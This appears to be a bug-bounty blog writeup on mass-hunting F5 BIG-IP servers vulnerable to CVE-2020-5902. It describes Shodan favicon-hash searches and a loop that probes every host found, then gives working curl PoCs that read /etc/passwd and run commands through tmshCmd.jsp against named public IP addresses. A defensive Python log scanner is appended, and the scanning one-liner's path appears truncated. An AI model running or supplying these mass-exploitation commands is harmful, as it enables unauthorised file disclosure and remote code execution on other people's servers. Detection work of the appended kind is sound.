CVE-2020–5902 Mass Hunting with shodan and Favfreak
Google Dork : inurl:/tmui/login.jsp
Hey Guys!! It’s me Anon Tuttu Venus again with another writeup! [Just second one :P]
I know that this writeup is too late.
But still, I thought about noting down the process I followed for finding CVE-2020-5902.
I have done all of this on my Kali Linux machine.
!!!!!!!!!SPOILER ALERT!!!!!!!!!!
Main Content :
These are the two commands which we are going to use.
I will explain how to run these commands without errors.
Prerequisites :
A Shodan premium account is required [ API key ]
Tools that need to be installed:
FavFreak is a new tool developed by Devansh Batham.
Writeup: https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
How to set up FavFreak:
Original: https://github.com/devanshbatham/FavFreak
git clone https://github.com/devanshbatham/FavFreak
cd FavFreak
pip3 install -r requirements.txt
Shodan CLI is the command-line version of Shodan.io.
How to install and configure?
- easy_install shodan
- shodan init YOUR_API_KEY
Original: https://cli.shodan.io/
Assetfinder, developed by @tomnomnom, is used to grab subdomains.
How to set up assetfinder:
Use the go get method, which is the easiest one:
go get -u github.com/tomnomnom/assetfinder
httprobe, developed by @tomnomnom, takes a list of domains and checks for working HTTP and HTTPS servers.
How to set up httprobe:
Use the go get method, which is the easiest one:
go get -u github.com/tomnomnom/httprobe
Once everything is installed, run the 1st command:
assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output --shodan
/root/Tools: This is the directory where I have stored my tools [ this may differ in your case ]
Command breakdown:
assetfinder -subs-only target.com will find the subdomains
httprobe will check for HTTP and HTTPS services
--shodan will list the Shodan dorks
Once the above command runs successfully we will get an output similar to this :
Now copy each hash without the [ ], replace <input hash> with it, and run the 2nd command:
shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && printf "$host \033[0;31mVulnerable\033[0m\n" || printf "$host \033[0;32mNot Vulnerable\033[0m\n"; done
The output of this command will show whether each server is Vulnerable or Not Vulnerable.
If the output says it is Vulnerable, then run the PoC.
Either use curl or load the URL directly in the browser.
Curl commands:
curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'
NOTE: There are chances of getting false positives!! && Higher Chance of getting DUPLICATE REPORT!!!!!
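As an added example that is not part of the original writeup: a small Python check a defender can run over web-server access logs to spot the `..;` traversal that the PoC above relies on. The log lines are constructed samples, and the regexes and finding labels are my own assumptions, not part of any F5 or Shodan tooling.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): a normal login-page
# hit, the two traversal requests from the PoC, a URL-encoded variant of the
# same traversal, and a direct hit on the workspace endpoint without traversal.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2020:10:00:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [01/Jul/2020:10:00:03 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami HTTP/1.1" 200 64
10.0.0.7 - - [01/Jul/2020:10:00:04 +0000] "GET /tmui/login.jsp/%2e%2e%3b/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 200 300
10.0.0.3 - - [01/Jul/2020:10:00:05 +0000] "GET /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 401 0
"""

# Combined-log-format parser: client IP, request method, path and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The "..;" segment after /tmui/login.jsp is the traversal primitive the PoC uses.
TRAVERSAL_RE = re.compile(r'/tmui/login\.jsp/[^?]*\.\.;')
# The two workspace endpoints named in the writeup; direct hits are worth a look too.
WORKSPACE_RE = re.compile(r'/tmui/locallb/workspace/(?:fileRead|tmshCmd)\.jsp')


def classify(path, status):
    """Return a finding label for one request path, or None when it looks benign."""
    decoded = unquote(path)  # expose %2e%2e%3b-style encodings before matching
    if TRAVERSAL_RE.search(decoded):
        # A 200 means the back end served the traversed request; anything else
        # is still an attempt worth recording.
        return "traversal_success" if status == 200 else "traversal_attempt"
    if WORKSPACE_RE.search(decoded):
        return "workspace_probe"
    return None


def scan_log(text):
    """Parse access-log text and return (ip, label, decoded_path) for each finding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["path"], int(m["status"]))
        if label:
            findings.append((m["ip"], label, unquote(m["path"])))
    return findings


if __name__ == "__main__":
    for ip, label, path in scan_log(SAMPLE_LOG):
        print(f"{ip:12} {label:18} {path}")
```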
Happy Hunting !!
I have seen that some people are struggling to set up Go on a Linux machine.
Steps to set up Go:
- Download go from official website https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
- cd /root/Download [ Assuming this is your download location ]
- tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
- vim ~/.bashrc and add the following lines:
export GOPATH=/root/go-workspace
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
- source ~/.bashrc